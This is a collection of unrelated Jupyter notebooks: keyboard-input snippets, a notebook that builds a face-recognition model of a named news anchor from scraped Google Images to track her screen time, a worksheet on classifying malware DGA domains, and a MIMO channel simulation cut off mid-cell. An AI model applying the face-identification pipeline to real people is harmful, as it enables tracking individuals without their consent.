windowSurface.fill(BLACK)

while True:
    events = pygame.event.get()
    for event in events:
        # Bug fix: pygame.K_q is a *key code*, not an event type, so the old
        # test `event.type == pygame.K_q` could never detect the Q key.
        # Detect it via a KEYDOWN event whose `key` attribute is K_q.
        if event.type == pygame.KEYDOWN and event.key == pygame.K_q:
            print('输入了Q,退出')
            pygame.quit()
            sys.exit()
        print(event.type)
```
# tkinter
```
try: # In order to be able to import tkinter for
import tkinter as tk # either in python 2 or in python 3
except ImportError:
import Tkinter as tk
def onKeyPress(event):
    # Echo the pressed character into the text widget.
    text.insert('end', 'You pressed %s\n' % (event.char, ))

# Build a small window with a black text area and bind all key presses.
window = tk.Tk()
window.geometry('300x200')
text = tk.Text(window, background='black', foreground='white', font=('Comic Sans MS', 12))
text.pack()
window.bind('<KeyPress>', onKeyPress)
window.mainloop()
```
| github_jupyter |
<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc" style="margin-top: 1em;"><ul class="toc-item"><li><span><a href="#Name" data-toc-modified-id="Name-1"><span class="toc-item-num">1 </span>Name</a></span></li><li><span><a href="#Search" data-toc-modified-id="Search-2"><span class="toc-item-num">2 </span>Search</a></span><ul class="toc-item"><li><span><a href="#Load-Cached-Results" data-toc-modified-id="Load-Cached-Results-2.1"><span class="toc-item-num">2.1 </span>Load Cached Results</a></span></li><li><span><a href="#Build-Model-From-Google-Images" data-toc-modified-id="Build-Model-From-Google-Images-2.2"><span class="toc-item-num">2.2 </span>Build Model From Google Images</a></span></li></ul></li><li><span><a href="#Analysis" data-toc-modified-id="Analysis-3"><span class="toc-item-num">3 </span>Analysis</a></span><ul class="toc-item"><li><span><a href="#Gender-cross-validation" data-toc-modified-id="Gender-cross-validation-3.1"><span class="toc-item-num">3.1 </span>Gender cross validation</a></span></li><li><span><a href="#Face-Sizes" data-toc-modified-id="Face-Sizes-3.2"><span class="toc-item-num">3.2 </span>Face Sizes</a></span></li><li><span><a href="#Screen-Time-Across-All-Shows" data-toc-modified-id="Screen-Time-Across-All-Shows-3.3"><span class="toc-item-num">3.3 </span>Screen Time Across All Shows</a></span></li><li><span><a href="#Appearances-on-a-Single-Show" data-toc-modified-id="Appearances-on-a-Single-Show-3.4"><span class="toc-item-num">3.4 </span>Appearances on a Single Show</a></span></li><li><span><a href="#Other-People-Who-Are-On-Screen" data-toc-modified-id="Other-People-Who-Are-On-Screen-3.5"><span class="toc-item-num">3.5 </span>Other People Who Are On Screen</a></span></li></ul></li><li><span><a href="#Persist-to-Cloud" data-toc-modified-id="Persist-to-Cloud-4"><span class="toc-item-num">4 </span>Persist to Cloud</a></span><ul class="toc-item"><li><span><a href="#Save-Model-to-Google-Cloud-Storage" data-toc-modified-id="Save-Model-to-Google-Cloud-Storage-4.1"><span 
class="toc-item-num">4.1 </span>Save Model to Google Cloud Storage</a></span></li><li><span><a href="#Save-Labels-to-DB" data-toc-modified-id="Save-Labels-to-DB-4.2"><span class="toc-item-num">4.2 </span>Save Labels to DB</a></span><ul class="toc-item"><li><span><a href="#Commit-the-person-and-labeler" data-toc-modified-id="Commit-the-person-and-labeler-4.2.1"><span class="toc-item-num">4.2.1 </span>Commit the person and labeler</a></span></li><li><span><a href="#Commit-the-FaceIdentity-labels" data-toc-modified-id="Commit-the-FaceIdentity-labels-4.2.2"><span class="toc-item-num">4.2.2 </span>Commit the FaceIdentity labels</a></span></li></ul></li></ul></li></ul></div>
```
from esper.prelude import *
from esper.identity import *
from esper import embed_google_images
```
# Name
Please add the person's name and their expected gender below (Male/Female).
```
name = 'Yasmin Vossoughian'
gender = 'Female'
```
# Search
## Load Cached Results
Reads cached identity model from local disk. Run this if the person has been labelled before and you only wish to regenerate the graphs. Otherwise, if you have never created a model for this person, please see the next section.
```
assert name != ''  # a person name must be entered in the cell above
# Load the previously saved identity model for this person from local disk.
results = FaceIdentityModel.load(name=name)
# Show the reference face images the model was built from.
imshow(tile_imgs([cv2.resize(x[1][0], (200, 200)) for x in results.model_params['images']], cols=10))
plt.show()
plot_precision_and_cdf(results)
```
## Build Model From Google Images
Run this section if you do not have a cached model and precision curve estimates. This section will grab images using Google Image Search and score each of the faces in the dataset. We will interactively build the precision vs score curve.
It is important that the images that you select are accurate. If you make a mistake, rerun the cell below.
```
assert name != ''  # a person name must be entered at the top of the notebook
# Grab face images from Google Image Search
img_dir = embed_google_images.fetch_images(name)
# If the images returned are not satisfactory, rerun the above with extra params:
# query_extras='' # additional keywords to add to search
# force=True # ignore cached images
# Interactively pick the faces that really belong to the target person
face_imgs = load_and_select_faces_from_images(img_dir)
# Compute an embedding vector for every selected face
face_embs = embed_google_images.embed_images(face_imgs)
assert(len(face_embs) == len(face_imgs))
reference_imgs = tile_imgs([cv2.resize(x[0], (200, 200)) for x in face_imgs if x], cols=10)
def show_reference_imgs():
    """Display the user-selected reference images for the current name."""
    print('User selected reference images for {}.'.format(name))
    imshow(reference_imgs)
    plt.show()
show_reference_imgs()
# Score all of the faces in the dataset (this can take a minute)
face_ids_by_bucket, face_ids_to_score = face_search_by_embeddings(face_embs)
precision_model = PrecisionModel(face_ids_by_bucket)
```
Now we will validate which of the images in the dataset are of the target identity.
__Hover over with mouse and press S to select a face. Press F to expand the frame.__
```
# Label the LOWER buckets (faces far from the reference embeddings).
show_reference_imgs()
print(('Mark all images that ARE NOT {}. Thumbnails are ordered by DESCENDING distance '
       'to your selected images. (The first page is more likely to have non "{}" images.) '
       'There are a total of {} frames. (CLICK THE DISABLE JUPYTER KEYBOARD BUTTON '
       'BEFORE PROCEEDING.)').format(
       name, name, precision_model.get_lower_count()))
lower_widget = precision_model.get_lower_widget()
lower_widget
# Label the UPPER buckets (faces close to the reference embeddings).
show_reference_imgs()
print(('Mark all images that ARE {}. Thumbnails are ordered by ASCENDING distance '
       'to your selected images. (The first page is more likely to have "{}" images.) '
       'There are a total of {} frames. (CLICK THE DISABLE JUPYTER KEYBOARD BUTTON '
       'BEFORE PROCEEDING.)').format(
       # Fix: this message describes the upper buckets, but the original
       # reported the lower-bucket count (copy-paste error).
       name, name, precision_model.get_upper_count()))
upper_widget = precision_model.get_upper_widget()
upper_widget
```
Run the following cell after labelling to compute the precision curve. Do not forget to re-enable jupyter shortcuts.
```
# Compute the precision from the selections made in the widgets above
lower_precision = precision_model.compute_precision_for_lower_buckets(lower_widget.selected)
upper_precision = precision_model.compute_precision_for_upper_buckets(upper_widget.selected)
# Merge the per-bucket precision estimates from both labelling passes
precision_by_bucket = {**lower_precision, **upper_precision}
# Bundle everything into a single identity-model object
results = FaceIdentityModel(
    name=name,
    face_ids_by_bucket=face_ids_by_bucket,
    face_ids_to_score=face_ids_to_score,
    precision_by_bucket=precision_by_bucket,
    model_params={
        'images': list(zip(face_embs, face_imgs))
    }
)
plot_precision_and_cdf(results)
```
The next cell persists the model locally.
```
results.save()
```
# Analysis
## Gender cross validation
Situations where the identity model disagrees with the gender classifier may be cause for alarm. We would like to check that instances of the person have the expected gender as a sanity check. This section shows the breakdown of the identity instances and their labels from the gender classifier.
```
# Tally how the gender classifier labels the faces attributed to this person.
gender_breakdown = compute_gender_breakdown(results)
print('Expected counts by gender:')
for gender_label, count in gender_breakdown.items():
    print(' {} : {}'.format(gender_label, int(count)))
print()
print('Percentage by gender:')
total = sum(gender_breakdown.values())
for gender_label, count in gender_breakdown.items():
    print(' {} : {:0.1f}%'.format(gender_label, 100 * count / total))
print()
```
Situations where the identity detector returns high confidence, but where the gender is not the expected gender indicate either an error on the part of the identity detector or the gender detector. The following visualization shows randomly sampled images, where the identity detector returns high confidence, grouped by the gender label.
```
high_probability_threshold = 0.8
show_gender_examples(results, high_probability_threshold)
```
## Face Sizes
Faces shown on-screen vary in size. For a person such as a host, they may be shown in a full body shot or as a face in a box. Faces in the background or those that are part of side graphics might be smaller than the rest. When calculating screentime for a person, we would like to know whether the results represent the time the person was featured as opposed to merely in the background or as a tiny thumbnail in some graphic.
The next cell, plots the distribution of face sizes. Some possible anomalies include there only being very small faces or large faces.
```
plot_histogram_of_face_sizes(results)
```
The histogram above shows the distribution of face sizes, but not how those sizes occur in the dataset. For instance, one might ask why some faces are so large or whether the small faces are actually errors. The following cell groups example faces, which are of the target identity with high probability, by their sizes in terms of screen area.
```
high_probability_threshold = 0.8
show_faces_by_size(results, high_probability_threshold, n=10)
```
## Screen Time Across All Shows
One question that we might ask about a person is whether they received a significantly different amount of screentime on different shows. The following section visualizes the amount of screentime by show in total minutes and also in proportion of the show's total time. For a celebrity or political figure such as Donald Trump, we would expect significant screentime on many shows. For a show host such as Wolf Blitzer, we expect that the screentime be high for shows hosted by Wolf Blitzer.
```
screen_time_by_show = get_screen_time_by_show(results)
plot_screen_time_by_show(name, screen_time_by_show)
```
## Appearances on a Single Show
For people such as hosts, we would like to examine in greater detail the screen time allotted for a single show. First, fill in a show below.
```
show_name = 'First Look'
# Compute the screen time for each video of the show
screen_time_by_video_id = compute_screen_time_by_video(results, show_name)
```
One question we might ask about a host is how long they are shown on screen in an episode. Likewise, we might also ask for how many episodes the host is not present due to being on vacation or on assignment elsewhere. The following cell plots a histogram of the distribution of the length of the person's appearances in videos of the chosen show.
```
plot_histogram_of_screen_times_by_video(name, show_name, screen_time_by_video_id)
```
For a host, we expect screentime over time to be consistent as long as the person remains a host. For figures such as Hillary Clinton, we expect the screentime to track events in the real world, such as the lead-up to the 2016 election, and then to drop afterwards. The following cell plots a time series of the person's screentime over time. Each dot is a video of the chosen show. Red Xs are videos for which the face detector did not run.
```
plot_screentime_over_time(name, show_name, screen_time_by_video_id)
```
We hypothesized that a host is more likely to appear at the beginning of a video and then also appear throughout the video. The following plot visualizes the distribution of shot beginning times for videos of the show.
```
plot_distribution_of_appearance_times_by_video(results, show_name)
```
In section 3.3, we saw that some shows may have much larger variance in the screen time estimates than others. This may be because a host or frequent guest appears similar to the target identity. Alternatively, the images of the identity may be consistently low quality, leading to lower scores. The next cell plots a histogram of the probabilities for faces in a show.
```
plot_distribution_of_identity_probabilities(results, show_name)
```
## Other People Who Are On Screen
For some people, we are interested in who they are often portrayed on screen with. For instance, the White House press secretary might routinely be shown with the same group of political pundits. A host of a show, might be expected to be on screen with their co-host most of the time. The next cell takes an identity model with high probability faces and displays clusters of faces that are on screen with the target person.
```
get_other_people_who_are_on_screen(results, k=25, precision_thresh=0.8)
```
# Persist to Cloud
The remaining code in this notebook uploads the built identity model to Google Cloud Storage and adds the FaceIdentity labels to the database.
## Save Model to Google Cloud Storage
```
gcs_model_path = results.save_to_gcs()
```
To ensure that the model stored to Google Cloud is valid, we load it and print the precision and cdf curve below.
```
gcs_results = FaceIdentityModel.load_from_gcs(name=name)
imshow(tile_imgs([cv2.resize(x[1][0], (200, 200)) for x in gcs_results.model_params['images']], cols=10))
plt.show()
plot_precision_and_cdf(gcs_results)
```
## Save Labels to DB
If you are satisfied with the model, we can commit the labels to the database.
```
from django.core.exceptions import ObjectDoesNotExist
def standardize_name(name):
    """Normalize a person name for database lookup (lowercase)."""
    return name.lower()
person_type = ThingType.objects.get(name='person')
# Reuse the existing Person row if one exists; otherwise build a new
# (unsaved) one.  Neither object is committed here -- see the next cells.
try:
    person = Thing.objects.get(name=standardize_name(name), type=person_type)
    print('Found person:', person.name)
except ObjectDoesNotExist:
    person = Thing(name=standardize_name(name), type=person_type)
    print('Creating person:', person.name)
labeler = Labeler(name='face-identity:{}'.format(person.name), data_path=gcs_model_path)
```
### Commit the person and labeler
The labeler and person have been created but not yet saved to the database. If a person was created, please make sure that the name is correct before saving.
```
person.save()
labeler.save()
```
### Commit the FaceIdentity labels
Now, we are ready to add the labels to the database. We will create a FaceIdentity for each face whose probability exceeds the minimum threshold.
```
commit_face_identities_to_db(results, person, labeler, min_threshold=0.001)
print('Committed {} labels to the db'.format(FaceIdentity.objects.filter(labeler=labeler).count()))
```
| github_jupyter |
<img src="../img/logo_white_bkg_small.png" align="left" />
# Feature Engineering
This worksheet covers concepts covered in the first part of the Feature Engineering module. It should take no more than 30-40 minutes to complete. Please raise your hand if you get stuck.
## Import the Libraries
For this exercise, we will be using:
* Pandas (http://pandas.pydata.org/pandas-docs/stable/)
* Numpy (https://docs.scipy.org/doc/numpy/reference/)
* Matplotlib (http://matplotlib.org/api/pyplot_api.html)
* Scikit-learn (http://scikit-learn.org/stable/documentation.html)
* YellowBrick (http://www.scikit-yb.org/en/latest/)
* Seaborn (https://seaborn.pydata.org)
```
# Load Libraries - Make sure to run this cell!
import pandas as pd
import numpy as np
import re
from collections import Counter
from sklearn import feature_extraction, tree, model_selection, metrics
from yellowbrick.features import Rank2D
from yellowbrick.features import RadViz
from yellowbrick.features import ParallelCoordinates
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib
import entropy
%matplotlib inline
```
## Feature Engineering
This worksheet is a step-by-step guide on how to detect domains that were generated using a "Domain Generation Algorithm" (DGA). We will walk you through the process of transforming raw domain strings to Machine Learning features and creating a decision tree classifier which you will use to determine whether a given domain is legit or not. Once you have implemented the classifier, the worksheet will walk you through evaluating your model.
Overview 2 main steps:
1. **Feature Engineering** - from raw domain strings to numeric Machine Learning features using DataFrame manipulations
2. **Machine Learning Classification** - predict whether a domain is legit or not using a Decision Tree Classifier
**DGA - Background**
"Various families of malware use domain generation
algorithms (DGAs) to generate a large number of pseudo-random
domain names to connect to a command and control (C2) server.
In order to block DGA C2 traffic, security organizations must
first discover the algorithm by reverse engineering malware
samples, then generate a list of domains for a given seed. The
domains are then either preregistered, sink-holed or published
in a DNS blacklist. This process is not only tedious, but can
be readily circumvented by malware authors. An alternative
approach to stop malware from using DGAs is to intercept DNS
queries on a network and predict whether domains are DGA
generated. Much of the previous work in DGA detection is based
on finding groupings of like domains and using their statistical
properties to determine if they are DGA generated. However,
these techniques are run over large time windows and cannot be
used for real-time detection and prevention. In addition, many of
these techniques also use contextual information such as passive
DNS and aggregations of all NXDomains throughout a network.
Such requirements are not only costly to integrate, they may not
be possible due to real-world constraints of many systems (such
as endpoint detection). An alternative to these systems is a much
harder problem: detect DGA generation on a per domain basis
with no information except for the domain name. Previous work
to solve this harder problem exhibits poor performance and many
of these systems rely heavily on manual creation of features;
a time consuming process that can easily be circumvented by
malware authors..."
[Citation: Woodbridge et. al 2016: "Predicting Domain Generation Algorithms with Long Short-Term Memory Networks"]
A better alternative for real-world deployment would be to use "featureless deep learning" - We have a separate notebook where you can see how this can be implemented!( https://www.endgame.com/blog/technical-blog/using-deep-learning-detect-dgas, https://github.com/endgameinc/dga_predict)
**However, let's learn the basics first!!!**
## Worksheet for Part 1 - Feature Engineering
```
## Load data
df = pd.read_csv('../data/dga_data_small.csv')
# host/subclass are not used as features in this worksheet
df.drop(['host', 'subclass'], axis=1, inplace=True)
print(df.shape)
df.sample(n=5).head() # print a random sample of the DataFrame
df[df.isDGA == 'legit'].head()
# Google's 10000 most common english words will be needed to derive a feature called ngrams...
# therefore we already load them here.
top_en_words = pd.read_csv('../data/google-10000-english.txt', header=None, names=['words'])
top_en_words.sample(n=5).head()
# Source: https://github.com/first20hours/google-10000-english
# NOTE(review): `d` is rebound later from a pickle of ngram counts; this
# DataFrame alias appears unused downstream -- confirm before relying on it.
d = top_en_words
```
## Part 1 - Feature Engineering
Option 1 to derive Machine Learning features is to manually hand-craft useful contextual information of the domain string. An alternative approach (not covered in this notebook) is "Featureless Deep Learning", where an embedding layer takes care of deriving features - a huge step towards more "AI".
Previous academic research has focused on the following features that are based on contextual information:
**List of features**:
1. Length ["length"]
2. Number of digits ["digits"]
3. Entropy ["entropy"] - use ```H_entropy``` function provided
4. Vowel to consonant ratio ["vowel-cons"] - use ```vowel_consonant_ratio``` function provided
5. The index of the first digit - use the ``firstDigitIndex`` function provided
5. N-grams ["n-grams"] - use ```ngram``` functions provided
**Tasks**:
Split into A and B parts, see below...
Please run the following function cell and then continue reading the next markdown cell with more details on how to derive those features. Have fun!
```
def H_entropy(x):
    """Return the Shannon entropy (in bits) of the character distribution of *x*.

    Self-contained replacement for ``entropy.shannon_entropy`` so the
    notebook no longer requires the third-party ``entropy`` package; this
    is the same implementation used again later in this worksheet.
    """
    # dict.fromkeys preserves first-occurrence order of the unique characters
    prob = [float(x.count(c)) / len(x) for c in dict.fromkeys(list(x))]
    return -sum(p * np.log2(p) for p in prob)
def firstDigitIndex(s):
    """Return the 1-based position of the first digit in *s*, or 0 if none."""
    for position, char in enumerate(s, start=1):
        if char.isdigit():
            return position
    return 0
def vowel_consonant_ratio(x):
    """Return (# vowels) / (# consonants) in *x*, case-insensitive.

    Returns 0 when the string contains no consonants.  The original used a
    bare ``except``, which silently swallowed *any* error (e.g. passing a
    non-string); only the expected ZeroDivisionError is caught now.
    """
    x = x.lower()
    vowels_pattern = re.compile('([aeiou])')
    consonants_pattern = re.compile('([b-df-hj-np-tv-z])')
    vowels = re.findall(vowels_pattern, x)
    consonants = re.findall(consonants_pattern, x)
    try:
        ratio = len(vowels) / len(consonants)
    except ZeroDivisionError:  # no consonants at all
        ratio = 0
    return ratio
```
### Tasks - A - Feature Engineering
Please try to derive a new pandas 2D DataFrame with a new column for each of feature. Focus on ```length```, ```digits```, ```entropy``` and ```vowel-cons``` here. Also make sure to encode the ```isDGA``` column as integers. [pandas.Series.str](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.str.html), [pandas.Series.replace](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.replace.html) and [pandas.Series,apply](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.apply.html) can be very helpful to quickly derive those features. Functions you need to apply here are provided in above cell.
The ```ngram``` is a bit more complicated, see next instruction cell to add this feature...
```
# derive features
# encode strings of target variable as integers
# check intermediate 2D pandas DataFrame
```
### Tasks - B - Feature Engineering
Finally, let's tackle the **ngram** feature. There are multiple steps involved to derive this feature. Here in this notebook, we use an implementation outlined in the this academic paper [Schiavoni 2014: "Phoenix: DGA-based Botnet Tracking and Intelligence" - see section: Linguistic Features](http://s2lab.isg.rhul.ac.uk/papers/files/dimva2014.pdf).
- **What are ngrams???** Imagine a string like 'facebook'. If I were to derive all n-grams for n=2 (aka bi-grams) I would get ['fa', 'ac', 'ce', 'eb', 'bo', 'oo', 'ok'] — you slide one step from the left and group 2 characters together each time. A tri-gram for 'facebook' would yield ['fac', 'ace', 'ceb', 'ebo', 'boo', 'ook']. Ngrams have a long history in natural language processing, but are also used a lot, for example, in detecting malicious executables (raw byte ngrams in this case).
Steps involved:
1. We have the 10000 most common english words (see data file we loaded, we call this DataFrame ```top_en_words``` in this notebook). Now we run the ```ngrams``` functions on a list of all these words. The output here is a list that contains ALL 1-grams, bi-grams and tri-grams of these 10000 most common english words.
2. We use the ```Counter``` function from collections to derive a dictionary ```d``` that contains the counts of all unique 1-grams, bi-grams and tri-grams.
3. Our ```ngram_feature``` function will do the core magic. It takes your domain as input, splits it into ngrams (n is a function parameter) and then looks up these ngrams in the english dictionary ```d``` we derived in step 2. Function returns the normalized sum of all ngrams that were contained in the english dictionary. For example, running ```ngram_feature('facebook', d, 2)``` will return 171.28 (this value is just like the one published in the Schiavoni paper).
4. Finally ```average_ngram_feature``` wraps around ```ngram_feature```. You will use this function as your task is to derive a feature that gives the average of the ngram_feature for n=1,2 and 3. Input to this function should be a simple list with entries calling ```ngram_feature``` with n=1,2 and 3, hence a list of 3 ngram_feature results.
5. **YOUR TURN: Apply ```average_ngram_feature``` to you domain column in the DataFrame thereby adding ```ngram``` to the df.**
6. **YOUR TURN: Finally drop the ```domain``` column from your DataFrame**.
Please run the following function cell and then write your code in the following cell.
```
# For simplicity let's just copy the needed function in here again
# Load dictionary of common english words from part 1
# Just run this cell...
from six.moves import cPickle as pickle
# NOTE(review): unpickling an untrusted file can execute arbitrary code;
# only load pickles produced by this course's own materials.
with open('../data/d_common_en_words' + '.pickle', 'rb') as f:
    d = pickle.load(f)
def H_entropy(x):
    """Shannon entropy (bits) of the character distribution of string *x*."""
    length = len(x)
    # Unique characters in first-occurrence order, as dict.fromkeys preserves it.
    probabilities = [x.count(ch) / length for ch in dict.fromkeys(x)]
    return -sum(p * np.log2(p) for p in probabilities)
def vowel_consonant_ratio(x):
    """Vowel-to-consonant ratio of *x* (lowercased); 0 if there are no consonants.

    Fix: the original bare ``except`` hid every error, not just division
    by zero; only ZeroDivisionError is caught now.
    """
    x = x.lower()
    vowels_pattern = re.compile('([aeiou])')
    consonants_pattern = re.compile('([b-df-hj-np-tv-z])')
    vowels = re.findall(vowels_pattern, x)
    consonants = re.findall(consonants_pattern, x)
    try:
        ratio = len(vowels) / len(consonants)
    except ZeroDivisionError:  # string has no consonants
        ratio = 0
    return ratio
# ngrams: Implementation according to Schiavoni 2014: "Phoenix: DGA-based Botnet Tracking and Intelligence"
# http://s2lab.isg.rhul.ac.uk/papers/files/dimva2014.pdf
def ngrams(word, n):
    """Extract all character n-grams and return them as one flat list.

    word: a single string or a list of strings
    n:    one integer or a list of integers (to extract several n-gram
          sizes in one call)

    The original had four near-identical branches for the str/list
    combinations of *word* and *n*; normalizing both arguments to lists
    collapses them into a single loop with identical output order.
    """
    words = word if isinstance(word, list) else [word]
    sizes = n if isinstance(n, list) else [n]
    l_ngrams = []
    for w in words:
        for size in sizes:
            # range is empty when len(w) < size, yielding no grams (as before)
            l_ngrams.extend(w[i:i + size] for i in range(len(w) - size + 1))
    return l_ngrams
def ngram_feature(domain, d, n):
    """Normalized "English-likeness" score of *domain* for one n-gram size.

    Splits *domain* into n-grams, sums the counts of those n-grams found
    in the English-dictionary count mapping *d*, and normalizes the sum
    by the number of n-grams in *domain* (Schiavoni 2014, linguistic
    features).

    Fixes: uses ``d.get(gram, 0)`` so a plain dict works too -- the
    original ``if d[ngram]`` raised KeyError for any n-gram missing from a
    non-defaultdict/Counter mapping -- and narrows the bare ``except``.
    """
    count_sum = sum(d.get(gram, 0) for gram in ngrams(domain, n))
    try:
        return count_sum / (len(domain) - n + 1)
    except (ZeroDivisionError, TypeError):
        # ZeroDivisionError: domain has exactly n-1 characters.
        # TypeError: n passed as a list (the original returned 0 here too).
        return 0
def average_ngram_feature(l_ngram_feature):
    """Average of a list of ngram_feature() results (typically n = 1, 2, 3).

    Fix: returns 0 for an empty list instead of raising ZeroDivisionError.
    """
    if not l_ngram_feature:
        return 0
    return sum(l_ngram_feature) / len(l_ngram_feature)
# Apply the average_ngram_features function to your data
# check final 2D pandas DataFrame containing all final features and the target vector isDGA
df.sample(10)
# Drop the domain column as we don't need it anymore
```
#### Breakpoint: Load Features and Labels
If you got stuck in Part 1, please simply load the feature matrix we prepared for you, so you can move on to Part 2 and train a Decision Tree Classifier.
```
df_final = pd.read_csv('../data/our_data_dga_features_final_df.csv')
print(df_final['isDGA'].value_counts())
df_final.sample(5)
```
### Visualizing the Results
At this point, we've created a dataset which has many features that can be used for classification. Using YellowBrick, your final step is to visualize the features to see which will be of value and which will not.
First, let's create a Rank2D visualizer to compute the correlations between all the features. Detailed documentation available here: http://www.scikit-yb.org/en/latest/examples/methods.html#feature-analysis
```
feature_names = ['length','digits','entropy','vowel-cons','firstDigitIndex','ngrams']
features = df_final[feature_names]
target = df_final.isDGA
# Your code here...
```
Now let's use a Seaborn pairplot as well. This will really show you which features have clear dividing lines between the classes. Docs are available here: http://seaborn.pydata.org/generated/seaborn.pairplot.html
```
# Your code here...
```
Finally, let's try making a RadViz of the features. This visualization will help us see whether there is too much noise to make accurate classifications.
```
# Your code here...
```
## Congrats!
Congrats! You've now extracted features from the dataset and are ready to begin creating some supervised models!
| github_jupyter |
```
# import necessary module
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import seaborn as sns
import scipy
from array_response import *
import itertools
from IPython.display import Image
from matplotlib.gridspec import GridSpec
```
### Parameters declaration
Declare parameters needed for channel realization
```
Ns = 1 # number of streams
Nc = 6 # number of cluster
Nray = 1 # number of rays in each cluster
Nt = 64 # number of transmit antennas
Nr = 16 # number of receive antennas
angle_sigma = 10/180*np.pi # standard deviation of the angles in azimuth and elevation both of Rx and Tx
gamma = np.sqrt((Nt*Nr)/(Nc*Nray)) # channel scaling factor (used in the normalization check below)
realization = 1000 # equivalent to number of taking sample
count = 0 # scratch counter, reused by later cells
eps = 0.1 # 20dB isolation
sigma = np.sqrt(8/(1+eps**2)) # according to the normalization condition of H
```
### Channel Realization
Realize channel H for Dual-Polarized antenna array
```
# Dual-polarized clustered channel model: for each realization draw ray angles,
# per-polarization complex path gains, and array responses, then assemble H.
H_pol = np.zeros((2*Nr,2*Nt,realization),dtype=complex) # channel before the polarization rotation
At = np.zeros((Nt,Nc*Nray,realization),dtype=complex) # transmit array response vectors, one per ray
Ar = np.zeros((Nr,Nc*Nray,realization),dtype=complex) # receive array response vectors, one per ray
alpha_hh = np.zeros((Nc*Nray,realization),dtype=complex) # path gains: H-tx -> H-rx coupling
alpha_hv = np.zeros((Nc*Nray,realization),dtype=complex) # path gains: H -> V coupling
alpha_vh = np.zeros((Nc*Nray,realization),dtype=complex) # path gains: V -> H coupling
alpha_vv = np.zeros((Nc*Nray,realization),dtype=complex) # path gains: V -> V coupling
AoD = np.zeros((2,Nc*Nray),dtype=complex) # angles of departure: row 0 azimuth, row 1 elevation
AoA = np.zeros((2,Nc*Nray),dtype=complex) # angles of arrival: row 0 azimuth, row 1 elevation
H = np.zeros((2*Nr,2*Nt,realization),dtype=complex) # final (rotated, scaled) channel
azi_rot = np.random.uniform(0,2*np.pi,realization) # random azimuth rotation per realization
ele_rot = np.random.uniform(0,np.pi/2,realization) # random elevation rotation; range is pi/2 -- TODO confirm why not pi
R = np.array([[np.cos(ele_rot)*np.cos(azi_rot),np.sin(ele_rot)],[-np.sin(ele_rot)*np.cos(azi_rot),np.cos(ele_rot)]]) # rotation matrix, broadcast to shape (2, 2, realization)
for reali in range(realization):
    for c in range(1,Nc+1):
        # Cluster-center angles are uniform; rays inside the cluster are
        # Laplacian-distributed around the center with spread angle_sigma.
        AoD_azi_m = np.random.uniform(0,2*np.pi,1) # Mean Angle of Departure _ azimuth
        AoD_ele_m = np.random.uniform(0,np.pi,1) # Mean Angle of Departure _ elevation
        AoA_azi_m = np.random.uniform(0,2*np.pi,1) # Mean Angle of Arrival_ azimuth
        AoA_ele_m = np.random.uniform(0,np.pi,1) # Mean Angle of Arrival_ elevation
        AoD[0,(c-1)*Nray:Nray*c] = np.random.laplace(AoD_azi_m, angle_sigma, (1,Nray))
        AoD[1,(c-1)*Nray:Nray*c] = np.random.laplace(AoD_ele_m, angle_sigma, (1,Nray))
        AoA[0,(c-1)*Nray:Nray*c] = np.random.laplace(AoA_azi_m, angle_sigma, (1,Nray))
        AoA[1,(c-1)*Nray:Nray*c] = np.random.laplace(AoA_ele_m, angle_sigma, (1,Nray))
    for j in range(Nc*Nray):
        At[:,j,reali] = array_response(AoD[0,j],AoD[1,j],Nt)/np.sqrt(2) # UPA array response
        Ar[:,j,reali] = array_response(AoA[0,j],AoA[1,j],Nr)/np.sqrt(2)
        # Angle-dependent gain variances; the cross-polar terms (hv, vh)
        # are attenuated by the isolation factor eps.
        var_hh = ((sigma**2)*(np.cos(AoD[0,j])**2)*(np.cos(AoA[0,j])**2)).real
        var_hv = ((eps**2)*(sigma**2)*(np.cos(AoD[1,j])**2)*(np.cos(AoA[0,j])**2)).real
        var_vh = ((eps**2)*(sigma**2)*(np.cos(AoD[0,j])**2)*(np.cos(AoA[1,j])**2)).real
        var_vv = ((sigma**2)*(np.cos(AoD[1,j])**2)*(np.cos(AoA[1,j])**2)).real
        # Circularly-symmetric complex Gaussian gains with the variances above.
        alpha_hh[j,reali] = np.random.normal(0, np.sqrt(var_hh/2)) + 1j*np.random.normal(0, np.sqrt(var_hh/2))
        alpha_hv[j,reali] = np.random.normal(0, np.sqrt(var_hv/2)) + 1j*np.random.normal(0, np.sqrt(var_hv/2))
        alpha_vh[j,reali] = np.random.normal(0, np.sqrt(var_vh/2)) + 1j*np.random.normal(0, np.sqrt(var_vh/2))
        alpha_vv[j,reali] = np.random.normal(0, np.sqrt(var_vv/2)) + 1j*np.random.normal(0, np.sqrt(var_vv/2))
        # 2x2 polarization gain matrix for this ray; accumulate its rank-one
        # contribution on the polarization-stacked channel via the Kronecker product.
        alpha = np.vstack((np.hstack((alpha_hh[j,reali],alpha_hv[j,reali])),np.hstack((alpha_vh[j,reali],alpha_vv[j,reali]))))
        H_pol[:,:,reali] = H_pol[:,:,reali] + np.kron(alpha,Ar[:,[j],reali]@At[:,[j],reali].conj().T)
    H_pol[:,:,reali] = 2*gamma* H_pol[:,:,reali] # scale by 2*gamma (see the Frobenius-norm check below)
    H[:,:,reali] = (np.kron(R[:,:,reali],np.eye(Nr)))@H_pol[:,:,reali] # apply the receive-side polarization rotation
    H[:,:,reali] = np.sqrt(4/3)*H[:,:,reali]
```
### Check normalized condition
```
# Sanity check: the mean squared Frobenius norm of each channel should match
# the normalization target 4*Nt*Nr.
channel_fro_1 = np.array([np.linalg.norm(H_pol[:, :, r], 'fro') for r in range(realization)])
print("4*Nt*Nr =", 4*Nt*Nr , " Frobenius norm H pol=", np.mean(channel_fro_1**2))
channel_fro_2 = np.array([np.linalg.norm(H[:, :, r], 'fro') for r in range(realization)])
print("4*Nt*Nr =", 4*Nt*Nr , " Frobenius norm =", np.mean(channel_fro_2**2))
```
### Joint Horizontal/Vertical Beamformer Selection
| hori_tx | hori_rx | verti_tx | verti_rx |
|:--------|--------|--------:|:---------:|
```
# Display the beam-combination illustration (IPython rich output).
Image("img/cluster.png")
```
### Histogram of chosen path
__path gain of each combination__
`num_path` = total number of beam-pairing combinations
`path_combi` = array listing every combination, one row per pairing
```
# Enumerate all candidate beam pairings. Each row of path_combi is
# [hori_tx, hori_rx, verti_tx, verti_rx]. The first total_combi rows steer
